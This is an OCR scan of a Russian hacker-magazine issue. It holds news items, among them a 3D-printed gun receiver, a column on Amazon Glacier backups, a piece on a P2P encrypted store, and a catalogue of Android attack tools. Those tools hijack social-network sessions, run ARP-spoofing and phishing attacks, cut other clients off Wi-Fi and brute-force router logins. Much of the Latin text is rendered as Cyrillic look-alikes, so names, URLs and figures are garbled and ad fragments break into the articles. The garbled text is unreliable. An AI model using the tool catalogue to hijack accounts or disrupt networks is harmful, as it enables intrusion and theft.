ВР8\#В000000»здІі © 3 © *птар*птароІ=ІІіІср © И 

Оказалось, что взбесившаяся техника у всех пострадавших печатает одно 
и то же, хотя принтеры у жертв были разными. Объединяет всех пострадавших 
одна простая вещь — все принтеры имели ІР-адреса и открытый порт 91 00. 

Судя по всему, «хакер»запустил программудля поиска уязвимостей 
на всех портах, в том числе на 9100-м, с использованием сканера ІМтар 
(или похожего решения). Дело в том, что у многих принтеров этот порт от- 
крыт во внешнюю сеть и готов печатать все, что получит в сетевом запро- 
се. К примеру, если на порт 91 00 зайти через браузер, принтер напечатает 
НТТР-заголовки. Кто именно решил позабавиться, история, ксожалению, 
умалчивает. 




КИМ ДОТКОМ ОБЕЩАЛ В ТВИТТЕРЕ ВОЗРОДИТЬ МЕОАУРЬОЛО 



«Я ЗНАЮ, ЧЕГО ВСЕ ВЫ ЖДЕТЕ. 
ОНО ГРЯДЕТ. В ЭТОМ ГОДУ. 
ОБЕЩАЮ. БОЛЬШЕ, ЛУЧШЕ, 
БЫСТРЕЕ. 100% БЕЗОПАСНЫЙ 
И НЕУДЕРЖИМЫ I» 
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ПРОКАЧАЖЛ 

СОСЕДЕЙ 





ОК0ДЗ для подключения 

любых источни ка в 



2 цифровых 

оптаческнн 
н коаксиальный 



2 аналоговых 

ЕСЛ аудио 
входа 



динамиков 

для передачи всех 

■отгенков звука 



Беспроводной пульт ДУ 

для регулировки параметров 
звучания 



возможность переключеньи 

менщу устройствами 




независимых 
каналов усиления 

3 усилителя по одному 
на каждый частотный диапазон 
ТгеЬве 



К2700 

отлично подгадит 
для использования с ВІиеРау 
и мультимедиа плеерами, 
игровыми приставками 
и компьютерами 



ЕОІРІЕР 



Реклама 







МЕ6АЫЕѴѴ5 



ЕВАУ ТОЖЕ БОРЕТСЯ с кибермошенниками. При поддержке аукциона за последниетри года было арестовано более 3000 человек. 



ЗАНИМАТЕЛЬНАЯ 
СТАТИСТИКА— СЧИТАЕМ 
ЗОМБИ В СОЦСЕТЯХ 




ЗАРАБОТАЛ ИЗОБЛИЧАЮЩИМ СЕРВИС 



□ последнее время раскрутка в различныхсоцсетях цветет 
пышным цветом. На черном рынке оптом и в розницу по- 
купают и продают фол оверов, друзей, «лайки» и прочее. Та- 
кими способами продвижения не гнушаются и политики, и крупные 
компании, и различные«звезды». 

Подсчитать количество фальшивых аккаунтов и просто «мертвых 
душ» в социальных медиа пытаются давно, и множество копий было 
сломано в спорах на эту тему. К примеру, недавнее журналистское 
расследование ВВС вызвало большой резонанс: ВВС уда л ось дока- 
зать, что поддельные «лайки» в РасеЬоок снижают эффективность 
рекламных кампаний. 

Теперь вычислить «зомби» станет несколько проще: заработал 
первый сервис, созданный для подсчета фейковыхфоловеров 
вТѵѵіиеги РасеЬоок Гакегз.зіаіизреоріе.сот/Ракегз/Бсогез ). 

Фальшивкой сервис считает юзеров, у которых вовсе нет или 
малотвитов, нетили мало фоловеров, и пользователей, которые 
фоловяткучудругихаккаунтов. Для оценки количества фейков 
составляется случайная выборка до 1000 фоловеров. К сожалению, 
этого мало для аккаунтов с миллионами последователей — велика 
вероятность осечки, — зато для аккаунтов, чья аудитория состав- 
ляет несколько десятков или соттысяч пользователей, результаты 
весьматочны. Например, для ЙХакерРІІ результаттаков: 9% фейко- 
вых, 25% неактивных, 66% настоящих :]. 



ЧутьбольшевЗ миллионов (8,7%) пользовательских 
профилей РасеЬоок являются фальшивыми. Такова офи- 
циальная статистика, обнародованная соцсетью в отчете 
для Комиссии по ценным бумагам и биржам США. 




АРРБЕ ПРОТИВ 5АМ51ІЫ6. 
ИТОГИ ПОСЛЕДСТВИЯ 

НЕПРИЯТНЫЕСВОДКИСФРОНТАПАТЕНТНЫХ 

ПРОТИВОСТОЯНИЙ 



азбирательство между компаниями Арріе и Затзипд 
длится уже более года. Взаимные обвинения продолжают 
поступать с обеих сторон, а яблоком раздора стали много- 
численные патенты обеих компаний, относящиеся как к дизайну 
устройств, так и к их функционалу. 

И вот суд присяжных на конец вы нес решение, и оно, к сожа- 
лению, бросает тень на всю патентную систему США. Затзипд 
признали виновной в копировании шести из семи заявленных Арріе 
технологий. Присяжные оценили потери Арріе в 1,05 миллиарда дол- 
ларов (сама Арріе настаивала на сумме 2,5-2,75 миллиарда). Встреч- 
ные претензии Затзипд, напротив, остались неудовлетворенными. 
Арріе теперь в судебном порядке требует вовсе за претить 5а тзипд 
продажи восьми моделей смартфонов на рынке США! Представите- 
ли Затзипд утверждают, что та кое решение отнюдь не победа Арріе, 
а потеря для всех американских потребителей. Приговор может 
повлечь за собой сужение выбора на рынке и повышение цен. 

И если претензии к дизайну еще объяснимы, то об абсурдности 
софтверных патентов и о том, что это крайне скользкая штука, мно- 
гие эксперты говорят уже давно. Если патентовать такие мелочи, 
как поведение ил и внешний вид интерфейса, очень скоро мы по- 
просту останемся без инноваций. Разработчикам вместо очевид- 
ных и простых решений придется придумывать нечто, не нарушаю- 
щее ничьих патентов. Стоит л и говорить, что рынок, пользователи 
и прогресс в целом вряд л и выиграют в такой ситуации? 





КОМПАНИЯ РѴШЕ ЕХРКЕ55, 
СПЕЦИАЛИЗИРУЮЩАЯСЯ НА 
ПОЛУЛЕГАЛЬНЫХ «ЖЕЛЕЗ- 
КАХ», открыла предзаказ 
гаджета Роѵѵег Рѵѵп. По сути, 
это комп, маскирующийся 
под обычный электрический 
удлинительи начиненный 
хакерским софтом. Управляют 
девайсом через веб-интерфейс 
по55Н-туннелю, команды мож- 
но отсылать даже 5М5. Стоит 
такой шпионский гаджет 1295 
долларов. 




ТѴѴІТТЕК ввел новые правила 
доступа ксвоей платформе 
дляразработчиковпри- 
ложений. Теперь создателям 
новых клиентов запрещено 
иметьсвыше ЮОтысяч 
юзеров. 



ВЕЗДЕСУЩИЙ ІЕѴ5 до- 
брался дажедо платфор- 
мы ВІаскВеггу, которую 
обычно зараза почти не 
затрагивает. Рольмалвари- 
первопроходца досталась 
софтине2іІМо. 
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ПО АДРЕСУ (ШТЮОК.СОМ заработал новый ОиІІоок от МісгозоН. Теперь это «почтовый сервис для индивидуальных пользователей». 



НАСТОЯЩЕЕ И БУДУЩЕЕЗБ-ПРИНТЕРОВ 



ПЕЧАТЬОРУЖИЯ И ДАЖЕ ДОМОВУЖЕ ДАЛЕКО НЕФАНТАСТИКА 

ще недавно, работая над небольшой заметкой 
о 30-принтерах, я пошутила, что если они продолжат и да- 
лее развиваться втомжедухе, власти скорозабеспокоятся 
и могутпопытатьсязапретитьихотгреха подальше. Похоже, шутка 
попала в цель. 

Специалисты давно предрекают, что в скором будущем 
на 30-принтере можно будет распечатывать всякие не особенно 
легальные штуки. За примерами не нужно ходить далеко — на про- 
шедшей в июле конференции НОРЕ (Наскегз Оп РІапеІ ЕагШ) 
хакер Рау показал, что на 30-принтере можно напечатать вполне 
работоспособный ключ от высокозащищенных наручников СЬиЬЬ 
и Вопоѵѵі. Также стоит вспомнить, что в начале года на ТЬе Рігаіе 
Ваузаработал раздел «РЬузіЫев», откуда предлагается скачать 
физические объекты (а точнее, заготовки для 30-принтеров). 

И хотя никакого особенного «криминала» там до сих пор нет, причи- 
ны для беспокойства у властей и параноиков уже появляются. 

Недавно успехами на поприще 30-печати поделился амери- 
канский оружейник, известный в сети под псевдонимом НаѵеВІие. 
На оружейном форуме он рассказал, что сумел распечатать 
на 30-принтере запчасти для огнестрельного оружия, тщатель- 
но протестировал полученное и остался доволен результатом. 
Разумеется, речь идет нео стволе, бойке и других механизмах, 
которые просто невозможно выполнить из пластика, но вот 
ствольную коробкуумельцу напечататьудалось. Пистолет 22-го 
калибра (5,6 мм) уже выдержал более 200 выстрелов и нормально 
функционирует. 

Оружейник использовал для своих экспериментов старенький 
принтер Бігаіазуз, и материал для ствольной коробки обошелся 
ему при мерно в 30 долларов. На современных Зй-принтерах за- 
траты должны составить итого меньше — примерно 10 долларов, 
вто время как аналогичная металлическая деталь стоит гораздо 
дороже. Файлы этот добрый человек выложил в открытый доступ, 




так что запчасти для огнестрелауже можно скачать с «Пиратской 
бухты», из вышеупомянутого раздела. 

Не особенно мирное применение Зй -принтерам нашла и армия 
США. В конце августа стало известно, что военные отправили в 
Афганистан мобильную лабораторию с инженерами и оборудовани- 
ем для 30-печати. Техническая служба РарісІ Ециірріпд Рогсе(РЕР) 
существуетс2002 года изанимается быстрым прототипированием 
и изготовлениемуникальныхдеталей подзаказ, позаявкам бойцов. 
Кроме 30- принтеров, в лаборатории установлена система Сотриіег 
ІМитегісаІ Сопігоі МасЬіпіпд для изготовления деталей из стали и 
алюминия и другое оборудование, множество инструментов, вроде 
плазменных резаков по металлу, сверлильных станков на магнит- 
ном основании, различных пил и та к дал ее. Что планируют изготав- 
ливать при помощи такого арсенала и печатать на Зй- принтерах на 
месте боевых действий, представить, в общем -то, не сложно. 

Впрочем, справедливости ради нужно сказать, что не все жаж- 
дут использовать новые технологи и в милитаристических целях. 

Ріа при мер, профессор Берок Кошевис из университета Южной 
Калифорнии предлагаетпечататьдома ( сопіоигсгаШпд.огд ). Н ет, 
не макеты — настоящие дома. Более того, Кошевис уже приступил 
к созданию образца строительного Зй- принтера, способного спра- 
виться с такой задачей. 



ПШ ПШгіЬДѴ-ІѴйІі Ыйр 




Я ЬІ р ІКІ1 Гімаі-І Ё*ыі ІІИЯГИ1 пир 

-ч™*> Мі и Мк? 



Если на печати оружейныхдеталей можносэкономитьденьги, то, печатая 
здания, можно сэкономить время. Ожидается, что принтер СопІоигСгаЙіпд 
будет способен напечатать коробку жил ого дома за 20 часов. И это включая 
несущиестены, перегородки и даже крышу! 




ХАКЕРЫ НИКАК НЕ ОСТАВЯТ В ПОКОЕ Я ДЕРНУЮ ПРОГРАММУ ИРАНА 



ВИРЬ, ПОРАЗИВШИЙ 
УРАНОВЫЕ ЗАВОДЫ 
ИРАНА, НОЧАМИ 
ВКЛЮЧАЕТ НА ЗАРА- 
ЖЕННЫХ МАШИНАХ 
ТРЕК ГРУППЫ АС^ОС. 
ГРОМКО И ВНЕЗАПНО 
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КОЛОНКА 
СТЁПЫ ИЛЬИНА 




Делаем бэкап данных в облако Атаюп с помощью РазЮІасіег 

БЭКАП БЭКАПОВ 



ВЕРДИ ЕЕ ДИСКИ 

Есть у нас в издательстве милая девушка 
Вера, которая каждый месяц делает страшное. 
Она берет рабочие файлы одного из прошлых 
номеров «Хакера» (тексты, иллюстрации и 
фотографии, файлы верстки) и заливает их на 
ОѴО-болванку. Для архива. Со временем файлы 
из рабочей папки автоматически удаляются, 
чтобы сетевое хранилище не забивалось под 
завязку, но файлы всегда остаются в архиве 
на болванке. В теории. На практике не раз 
случалось, что файлов нужного номера может 
не оказаться. Или, к примеру, на болванке, где 
должны быть файлы январского номера про- 
шлого года, легко могут обнаружиться файлы 
февральского. Ну что взять с ручной работы? 
Естественно, это давно надо было автомати- 
зировать, однако технической возможности 
не было. Журналов много, файлы большие — 
админы уверяют, что никаких их І\ІА5'ов для 
такого объема не хватит (особенно если нужно 
гарантировать целостность данных). При- 
шлось все брать в свои руки. Где разместить 
гигабайты данных максимально надежно и как 
можно более дешево? Пока я думал над этим 
вопросом, Атагоп анонсировал свой новый 
сервис Атагоп Біасіег. Это явно было послание 
свыше :). 



ПОЧЕМУТАК ДЕШЕВО? 

Напомню, что Атагоп — это далеко не просто 
интернет-магазин. И даже не просто про- 
изводитель читалок КіпсІІе. Это невероятно 
технологическая компания, предлагающая 
всем желающим свои механизмы Атагоп ѴѴеЬ 
Зегѵісез (АѴѴ5), позволяющие, к примеру, в мо- 
мент поднять ферму серверов (технология ЕС2), 
организовать бесперебойную отдачу неограни- 



ченного объема файлов (53) и с недавнего вре- 
мени еще и надежнейший бэкап данных. Если 
хочешь найти максимально дешевое хранили- 
ще для файлов, то это Атагоп Біасіег. Парадокс 
в том, что одновременно с этим оно может быть 
и очень дорогим. Цена хранения составляет 
0,01 доллара за гигабайт данных в месяц. 
Предельно безопасное хранилище для 100 Гб 
данных (а Атагоп гарантирует сохранность 
99,999 999 999%) обойдется всего в доллар в 
месяц. Где подвох? А все просто: Біасіег дей- 
ствительно позволяет дешево хранить данные, 
но достать их из бэкапа может быть очень доро- 
го. Бесплатно можно извлечь лишь 5% от всего 
размера бэкапа (каждый месяц), а свыше этого 
придется оплачивать от 0,01 доллара за каж- 
дый гигабайт (не считая дополнительных пла- 
тежей, но это нюансы). Кто-то скажет, что это 
обдиралово, но на самом деле этот сервис для 
них просто не подходит. Очень важно понять: 
это не хранилище файлов (вроде йгорЬох) — 
это именно бэкап. Сюда можно заливать самые 
важные файлы (например, фотографии) или 
даже делать копию бэкапа и быть уверенным, 
что если когда-нибудь с этими файлами что-то 
случится, то ты их точно сможешь извлечь из 
облака Атагоп. К слову, извлечь не такуж и 
быстро: запрос обрабатывается оттрех до пяти 
часов. Сложно сказать, что происходит в это 
время по ту сторону сервиса (возможно, ищутся 
дешевые жесткие диски с нужными файлами, 
которые были без питания, после чего данные 
извлекаются), но именно это позволяет Атагоп 
предлагать такую цену. 

КАК ЭТО МНЕ ПОМОГЛО? 

В моем случае это было как раз тем, что нужно. 
Ультрадешевый и надежный бэкап для данных, 



к которым обращаться нужно очень редко (а 
возможно, и никогда). Правда, при всей привле- 
кательности начать использовать Біасіег было 
не так просто. С ходу я не смог найти готовый 
клиент: несмотря на подробный АРІ, который 
предоставила Атагоп, программисты еще не 
успели написать клиенты. Я быстро нашел 
реализации на РуіЬоп и РегІ, но хотелось попро- 
бовать технологию с помощью какого-то чело- 
веческого клиента, которого еще не было, — я 
этот вопрос отложил. Уже через несколько 
дней (оцени скорость) вышел релиз виндового 
клиента РазіБІасіег Газіаіасіег.сот ), который 
уже умел загружать данные в Біасіег и по запро- 
су выгружать их обратно. Все, что нужно, — это 
завести аккаунт в АѴѴ5 и указать в настройках 
программы свои Ассезз Кеу Ю и Зесгеі Ассезз 
Кеу — ключи доступа, с помощью которых вы- 
полняется авторизация (их можно получить в 
разделе «Бесигііу Сгесіепііаіз»). Я быстро создал 
ѴаиІІ (отдельное хранилище файлов) и с хорошей 
скоростью загрузил туда бэкап одного из номе- 
ров. Сделал запрос на извлечение файлов — и 
смог их получить обратно через три часа. 

Стало ясно, что это как раз то, что надо. 

К сожалению, РазіБІасіег оказался очень 
простым клиентом, как и другая похожая 
поделка Бітріе Атагоп Біасіег ІІрІоасІег 
( зітрІедІасіегирІоасІег.ЬгіаптстісІіаеІ.сот І. — 
ни в том, ни в другом не предусмотрена воз- 
можность периодического бэкапа. Поэтому я 
нашел консольный клиент діасіег-сіі ( Шрз:// 
діШиЬ.сот/сагІоззд/дІасіег-сІі ), реализованный 
на Эаѵа, и через планировщик ппСгоп настро- 
ил ежемесячную загрузку бэкапов в облако. 

А Вера и дальше делает бэкапы на болванки. 

Но еще не знает, что мы ее, наверное, по этому 
поводу больше не побеспокоим. НЕ 
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Анатолий Ализар (аіііагйдтаіі.сот) 
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РгооРоРСопсерІ 

ДЕЦЕНТРАЛИЗОВАННОЕ 
Р2Р-ХРАНИЛИЩЕ 




ЧТО ЭТО 

«Криптосфера» ( ЬіІ:.ІуА/ѵг4ѵРѴѴ ) — распределенное хранилище 
с применением стойкой криптографии. Вместо централизованного 
сервера файловую систему образует неограниченное количество 
серверов в интернете. Любой желающий может предоставить кусо- 
чек своего дискового пространства для участия в единой мировой 
системе защищенного хранения данных. 

Вся информация в «Криптосфере» хранится в зашифрованном 
виде: используется или асимметричный шифр, или блочный шифр, 
или хеш-функция. Это относится к каждому пакету, проходящему 
через систему (включая рукопожатия!), и абсолютно ко всем храни- 
мым данным. 



его. Доступ к отдельным файлам получают только пользователи, 
обладающие соответствующими токенами. Идея создания подоб- 
ного распределенного хранилища высказывалась и раньше, были 
многочисленные попытки ее реализовать в рамках таких проектов, 
как МЫеІ, 6І\ШпеІ, Ргее Наѵеп, Тапдіег, РиЫіиз, Ргеепеі и ТаЬое- 
І_АР5. Был еще стартап МощЫаІіоп, который пытался построить рас- 
пределенную систему хранения данных, где каждый участник мог 
предоставлять свои ресурсы за виртуальную валюту Мощ. Авторы 
проекта говорят, что проект «Криптосфера» во многом создан также 
под влиянием біі — распределенной системы контроля версий. 

По идее, «Криптосфера» должна стать чем-то средним между 
Ргеепеі и МощЫаНоп. 



ЗАЧЕМ ЭТО НУЖНО 






КАК ЭТО РАБОТАЕТ 



Если проект станет популярным, то это будет начало нового этапа 
в эволюции интернета. Такую систему будет невозможно закрыть, 
подвергнуть цензуре или отследить источник информации. Среди 
возможных сфер использования — безопасные персональные 
бэкапы, обмен файлами в небольших группах (в стиле йгорЬох), 
защищенный от цензуры анонимный веб-хостинг. 

Использование «Криптосферы» несколько ограничено тем, 
что контент этого хранилища не может быть проиндексирован 
поисковыми системами, которые просто не смогут расшифровать 




Стратегия БуЬіІ-атаки 



По содержимому каждого файла вычисляется хеш 5НА256, который 
используется в качестве ключа блочного шифра АЕ5256. Для до- 
ступа к любому файлу нужно знать два хеша: хеш зашифрованного 
файла (чтобы получить разрешение у узла на скачивание файла) 
и хеш оригинального файла (для расшифровки его содержимого 
ключом АЕ5256). Таким образом, отдельные узлы «Криптосферы» 
могут хранить и передавать файлы, не имея доступа к их содер- 
жимому. Вся информация дублируется на разных серверах для 
повышения избыточности и, следовательно, надежности хранения. 
В отличие от Ргеепеі или Тог, здесь не маскируются пиринговые 
транзакции между отдельными узлами, но это мало что дает 
потенциальному злоумышленнику. Поскольку хранение данных 
осуществляется фрагментарно на разных машинах, то составление 
списка ІР-адресов, скачивающих какой-то файл, не может ничего 
доказать, ведь система спроектирована так, что фрагменты фай- 
лов постоянно копируются с одного узла на другой. 

«Криптосфера» пока находится на стадии раннего развития 
и не готова для использования. Всех заинтересованных приглаша- 
ют участвовать в разработке проекта, исходные коды опубликова- 
ны на (ЗііНиЬ. Обсуждение проекта идет на канале #сгурІозрЬеге 
на ігс.ітеепосіе.пеі, а также в Ооодіе-группе СгурІозрЬеге 
( дгоирз.доодІе.сот/дгоир/сгуріозрЬеге ). 

Разработчики считают, что для нормального функционирования 
такой сети нужно создать репутационную систему, которая стиму- 
лировала бы пользователей делиться ресурсами. Кроме того, нуж- 
но внедрить механизмы защиты от атак типа БуЬіІ — когда пользо- 
ватели могут эксплуатировать репутационную систему в Р2Р-сети, 
создавая большое количество фейковых аккаунтов и тем самым 
завладевая незаслуженно большой долей ресурсов. ПЕ 
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суЬег-рипк (ЫКег.сот/суЬегрипкусЫ 




РУБРИКА МОВИ-Е 

ЗАПУСКАЕМ В СЛЕДУЮЩЕМ НОМЕРЕ 




НОШО: КАК ИЗ ДЕВАЙСА 
НА І05/АЫ0К0Ш СДЕЛАТЬ 
ХАКЕРСКИЙ ИНСТРУМЕНТ 




«Смартфон с хакерскими утилитами? Нет 
такого», — еще недавно сказали бы мы 
тебе. Запустить привычные инструменты 
для реализации атак можно было разве 
что на каком-нибудь Маето. Теперь же 
многие инструменты портировали под ЮБ 
и Апсігоісі, а некоторые хак-тулзы были 
специально написаны для мобильного 
окружения. Может ли смартфон заменить 
ноутбук в тестах на проникновение? 

Мы решили проверить. 




Апсігоісі — популярная платформа не только для простых 
смертных, но и для правильных людей. Количество полезных 
][-утилит здесь просто зашкаливает. За это можно сказать 
спасибо ІІІМІХ-корням системы, значительно упростившим 
портирование многих инструментов на Апсігоісі. Увы, некото- 
рые из них Соодіе не пускает в РІау Зіоге, так что придется 
ставить соответствующие АРК вручную. Также для некоторых 
утилит нужен максимальный доступ к системе (например, 
файрволу ірІаЫез), поэтому следует заранее позаботиться о 
гооі-доступе. Для каждого производителя здесь использует- 
ся собственная технология, но найти необходимую инструк- 
цию достаточно просто. Неплохой набор НОѴѴТО собрал 
ресурс ІЛ'еНаскег ( ЬіТІѵ/еѴѴдРІи ). Однако если какой-то моде- 
ли тут найти не удалось, на помощь всегда приходит форум 
ХРА-РеѵеІорегз ( ѵѵѵѵѵѵ.хсіа-сіеѵеіорегз.сот ). на котором можно 
найти различную информацию фактически по любой модели 
АпбгоісІ-телефона. Так или иначе, часть из ниже описанных 
утилит заработают и без гооі-доступа. 
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Боевой смартфон 



МЕНЕДЖЕР ПАКЕТОВ 

ВоШгеѵѵ 

ЫНуАкРЭбЫ 

Начнем обзор с необычного менеджера 
пакетов. Разработчики называют его 
«утилитами для суперпользовате- 
лей», и это недалеко от правды. После 
установки ВоіВгеѵѵты получаешь 
репозиторий, откуда можешь загрузить 
огромное количество скомпилирован- 
ных под АпбгоісІ привычных инструмен- 
тов. Среди них: интерпретаторы РуіЬоп 
и РиЬу для запуска многочисленных 
инструментов, которые на них написа- 
ны, сниффер Ісрсіитр и сканер ІМтар 
для анализа сети, біі и ЗиЬѵегзіоп для 
работы с системами контроля версий и 
многое другое. 




СЕТЕВЫЕ СКАНЕРЫ 



РІР5 

ЫІІѵ/ОЕѴСМ 

Незаметный смартфон, который в от- 
личие от ноутбука легко помещается в 
карман и никогда не вызывает подозре- 
ний, может быть полезен для иссле- 
дования сети. Выше мы уже сказали, 
как можно установить ІМтар, но есть 
еще один вариант. РІР5 — это специ- 
ально адаптированный под АпбгоісІ, 
хотя и неофициальный порт сканера 
ІМтар. Азначит, ты сможешь быстро 
найти активные устройства в сети, 
определить их ОС с помощью опций по 
Ппдегргіпііпд'у, провести сканирование 
портов — короче говоря, сделать все, 
на что способен ІМтар. 




Ріпд 

ЬіІ.Іѵ/гЬЗШ 

С использованием ІМтар'а, несмотря на 
всю его мощь, есть две проблемы. Во- 
первых, параметры для сканирования 
передаются через ключи для запуска, 
которые надо не только знать, но еще и 
суметь ввести с неудобной мобильной 
клавиатуры. А во-вторых, результаты 
сканирования в консольном выводе 
не такие наглядные, как того хотелось 
бы. Этих недостатков лишен сканнер 
Ріпд, который очень быстро сканирует 
сеть, делает Ппдегргіпііпд, после чего 
в понятной форме выводит список 
всех доступных устройств, разделяя 
их по типам (роутер, десктоп, іРЬопе и 
так далее). При этом по каждому хосту 
можно быстро посмотреть список от- 
крытых портов. Причем прямо отсюда 
можно подключиться, скажем, к РТР, 
используя установленный в системе 
РТР-клиент, — очень удобно. 
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ЫеІАисШ 

Ьі1:.1ѵ/Р4ітс2 

Когда речь идет об анализе конкретно- 
го хоста, незаменимой может оказаться 
утилита ЫеіАисШ. Она работает на любом 
АпбгоісІ-устройстве (даже нерутованном) 
и позволяет не только быстро определить 
устройства в сети, но и исследовать их 
с помощью большой Япдегргіпііпд-базы 
для определения операционной системы, 
а также СМ5-систем, используемых на 
веб-сервере. Сейчас в базе более 3000 
цифровых отпечатков. 




№ Т00І5 

Ьі1:.Іѵ/ТВд М N и 

Если же нужно, напротив, работать на 
уровне ниже и тщательно исследовать 
работу сети, то здесь не обойтись без Ыеі 
Тооіз. Это незаменимый в работе системно- 
го администратора набор утилит, позво- 
ляющий полностью продиагностировать 
работу сети, к которой подключено устрой- 
ство. Пакет содержит более 15 различного 
рода программ, таких как ріпд, Ігасегоиіе, 
агр, сіпз, пеізіаі, гоиіе. 




МАНИПУЛЯЦИИ С ТРАФИКОМ 



БИагИог Воо* 

ЬіСІу/ѵѵрехЬА 

Основанный на Ісрбитр сниффер честно 
логирует в рсар-файл все данные, которые 
далее можно изучить с помощью привыч- 
ных утилит вроде ѴѴігезЬагк или Ыеіѵѵогк 
Міпег. Так как никакие возможности для 
МІТМ-атак в нем не реализованы, это скорее 
инструмент для анализа своего трафика. 

К примеру, это отличный способ изучить то, 
что передают программы, установленные на 
твой девайс из сомнительных репозиториев. 





РасеІЧіН 

Ьіі.Іѵ/еТаесІЬ 

Если говорить о боевых приложениях для 
Апбгоісі, то одним из самых нашумевших 
является РасеІМіІТ, реализующий перехват 
и внедрение в перехваченные веб-сессии. 
Скачав АРК-пакет с программой, можно 
практически на любом АпбгоісІ-смартфоне 
запустить этот хек-инструмент и, подклю- 
чившись к беспроводной сети, перехва- 
тывать аккаунты самых разных сервисов: 
РасеЬоок, Тѵѵіиег, «ВКонтакте» и так да- 
лее — всего более десяти. Угон сессии осу- 
ществляется средствами применения атаки 
АРР зрооЛпд, но атака возможна только на 
незащищенных соединениях (вклиниваться 
в 551-трафик РасеІМіІЧ не умеет). Чтобы сдер- 
жать поток скрипткидисов, автор ограничил 
максимальное число сессий тремя. 
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ОгоісІБЬеер 

ЬіІ.Іѵ/дпЦРг 

Если создатель Расе N ІИ хочет 
за использование денежку, то 
йгоісІЗЬеер — это полностью бесплат- 
ный инструмент с тем же функциона- 
лом. Правда, на официальном сайте ты 
не найдешь дистрибутива (это связано 
с суровыми законами Германии по 
части зесигііу-утилит), но его без про- 
блем можно найти в Сети. Основная 
задача утилиты — перехват пользо- 
вательских веб-сессий популярных 
социальных сетей, реализованный с 
помощью все того же АРР БрооПпд'а. 

А вот с безопасными подключениями 
беда: как и РасеШС йгоісІЭЬеер наот- 
рез отказывается работать с НТТР5- 
протоколом. 



Ыеіѵѵогк 5рооГег 

ЬИ.Іѵ/ИоДигг 

Эта утилита также демонстрирует 
небезопасность открытых беспро- 
водных сетей, но несколько в другой 
плоскости. Она не перехватывает 
пользовательские сессии, но позволяет 
с помощью спуфинг-атаки пропускать 
НТТР-трафик через себя, выполняя с 
ним заданные манипуляции. Начиная 
от обычных шалостей (заменить все 
картинки на сайте троллфейсами, пере- 
вернуть все изображения или, скажем, 
подменив выдачу Ооодіе) и заканчивая 
фишинговыми атаками, когда пользо- 
вателю подсовываются фейковые стра- 
ницы таких популярных сервисов, как 
{асеЬоок.сот, Ііпкесііп.сот, ѵкопіакіе.ги 
и многих других. 



Апіі (Апсігоісі Ыеіѵѵогк Тооікіі 
Ьу іітрегіит ПО) 

Ьіі.Іѵ/І-ѴѴѴѴдѵО 

Если спросить, какая хак-утилита 
для Апсігоісі наиболее мощная, то 
уАпІі, пожалуй, конкурентов нет. 

Это настоящий хакерский комбайн. 
Основная задача программы — ска- 
нирование сетевого периметра. Далее 
в бой вступают различные модули, с 
помощью которых реализован целый 
арсенал: это и прослушка трафика, и 
выполнение МІТМ-атак, и эксплуатация 
найденных уязвимостей. Правда, есть 
и свои минусы. Первое, что бросается 
в глаза, — эксплуатация уязвимостей 
производится лишь с центрального 
сервера программы, который находится 
в интернете, вследствие чего о целях, 
не имеющих внешнего ІР-адреса, мож- 
но забыть. 
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ТУННЕЛИРОВАНИЕ ТРАФИКА 







Тоіаі Соттапсіег 

Ьі1.Іѵ/075аМк 

Хорошо известный файловый менед- 
жер теперь и на смартфонах! Как и в 
настольной версии, тут предусмотрена 
система плагинов для подключения 
к различным сетевым директориям, а 
также канонический двухпанельный ре- 
жим — особенно удобно на планшетах. 




55Н ТиппеІ 

Ьіі.Іѵ/хЕіигѴѴ 

Хорошо, но как обеспечить безопас- 
ность своих данных, которые переда- 
ются в открытой беспроводной сети? 
Помимо ѴРІМ, который Апсігоісі под- 
держивает из коробки, можно поднять 
55Н-туннель. Для этого есть замеча- 
тельная утилита 55Н ТиппеІ, которая 
позволяет завернуть через удаленный 
55Н-сервер трафик выбранных прило- 
жений или всей системы в целом. 
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РгохуОгоісІ 

ЬИ.Іѵ/НрТІ5с 

Часто бывает необходимо пустить 
трафик через прокси или соке, и в этом 
случае выручит РгохуОгоісІ. Все просто: 
выбираешь, трафик каких приложений 
нужно туннелировать, и указываешь 
прокси (поддерживаются НТТР/НТТР5/ 
50СК54/50СК55). Если требуется 
авторизация, то РгохуОгоісІ это также 
поддерживает. К слову, конфигурацию 
можно забиндить на определенную 
беспроводную сеть, сделав разные на- 
стройки для каждой из них. 
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БЕСПРОВОДНЫЕ СЕТИ 

ѴѴіІі Апаіугег 

ЬИ.1у/у7Р0СЮ 

Встроенный менеджер беспроводных 
сетей не отличается информативно- 
стью. Если нужно быстро получить 
полную картину о находящихся 
рядом точках доступа, то утилита ѴѴ \і\ 
Апаіугег — отличный выбор. Она не 
только покажет все находящиеся рядом 
точки доступа, но и отобразит канал, на 
котором они работают, их МАС-адрес 
и, что важнее всего, используемый тип 
шифрования (увидев заветные буквы 
«ѴѴЕР», можно считать, что доступ в 
защищенную сеть обеспечен). Помимо 
этого, утилита идеально подойдет, если 
нужно найти, где физически находится 
нужная точка доступа, благодаря на- 
глядному индикатору уровня сигнала. 
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ѴѴІГІКІІІ 

ЬіІ.Іѵ/гГ2Нѵд 

Эта утилита, как заявляет ее разработчик, 
может быть полезна, когда беспроводная 
сеть под завязку забита клиентами, а имен- 
но в этот момент нужен хороший коннект 
и стабильная связь. ѴѴіРіКіІІ позволяет 
отключить клиентов от интернета как выбо- 
рочно, так и по определенному критерию (к 
примеру, возможно постебаться над всеми 
яблочниками). Программа всего-навсего 
выполняет атаку АНР зрооПпд и перена- 
правляет всех клиентов на самих себя. Этот 
алгоритм до глупости просто реализован на 
базе ірІаЫез. Такая вот панель управления 
для беспроводных сетей фастфуда :). 





АУДИТ ВЕБ-ПРИЛОЖЕНИЙ 



НТТР Оиегу ВиіІсІег 

Ыі.1ѵ/Р№аіР 

Манипулировать НТТР-запросами с ком- 
пьютера — плевое дело, для этого есть 
огромное количество утилит и плагинов 
для браузеров. В случае со смартфоном все 
немного сложнее. Отправить кастомный 
НТТР-запрос с нужными тебе параметрами, 
например нужной соокіе или измененным 
ІІзег-АдепІ, поможет НТТР Оиегу ВиіИег. 
Результат выполнения запроса будет ото- 
бражен в стандартном браузере. 




Воиіег Вгиіе Рогсе Ай5 2 

ЬИ.Іѵ/РаѵѵѴКА 

Если сайтзащищен паролем с помощью 
Вазіс Ассезз АиіЬепІісаІіоп, то проверить 
его надежность можно с помощью утилиты 
Ноиіег Вгиіе Рогсе Ай5 2. Изначально ути- 
лита создавалась для брутфорса паролей на 
админки роутера, но понятно, что она может 
быть использована и против любого другого 
ресурса с аналогичной защитой. Утилита ра- 
ботает, но явно сыровата. К примеру, разра- 
